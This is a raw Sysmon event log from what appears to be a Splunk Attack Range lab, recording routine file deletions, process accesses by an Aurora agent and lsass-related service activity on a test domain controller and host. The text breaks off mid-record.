23542300x800000000000000045734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:52.667{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0091C5490DD41D298F8646B924382E8,SHA256=1B740B59272907CF9A741F5645A66E94FBFC3DD7674170C73337004319874826,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018119Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:52.583{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FD1DABE37DEE158A8592D2D50965144,SHA256=95C0E20328CBC203042008AF332E8136C2BC663B5AF52774143E4F34402BB1D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:52.466{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:52.111{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:52.107{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:52.096{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:52.094{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:52.089{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:52.048{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:52.023{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:53.770{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD880D864E82C6FAE43E7DE9B214CC44,SHA256=A65BA36561D12B8D3A42784B04C454A64A5ACF4350B6A8BF381F89D0919D17D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018120Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:53.631{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA6D34509F294DEA830982AB762C9272,SHA256=4272E422042012FB1AA4185A4CC129572E5A6E387A7659CA4E542A3FA6EDFF53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018122Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:54.687{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA3B216805843073C5CA8C8C1968B42,SHA256=3589F750FD200AF5B1CEFEF5F56BFF67316E9EEF8B648B1FDE98CD66A3786D3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.970{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EAFCC2BAF61113449E833472DFE3C8C,SHA256=58B8E59737C26AE00C2B34A6D0B0391429D7531B5E1AFF0CD69218EECB85CAEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.913{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=46CFCB40FFD0A30D6994BE23A21F06F5,SHA256=AE533A1528E4F803C607004EDE3B03D8B594E0A938BBD9A41BE1C504D9EBC70C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.898{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=A86F1F29289E8576522473B9BA0FFE01,SHA256=8EFA541DDC5A442CF28F5C39B7DB7A676DE3467D2169B2B8F17DC8171F33FFBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:51.682{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56437-false10.0.1.12-8000- 10341000x800000000000000045741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.503{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.502{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.204{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.204{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.204{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.191{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000018121Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:52.071{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50164-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018123Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:55.762{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D6D3EDCC1F25180B9F94092D36877FF,SHA256=70D41815DB9B8688F870F2598E18540BBE25163A0ED07A8720927197D05D8046,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.947{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA1D281A0CEFF0620281D2C4B12C1C1C,SHA256=46C53E8083F2C1E543E04F51C33B2C305DC7C9CFBCD1B86733E8F03340C86526,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.338{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-048MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.101{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.097{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.087{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.087{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.086{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.085{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.084{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.077{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program 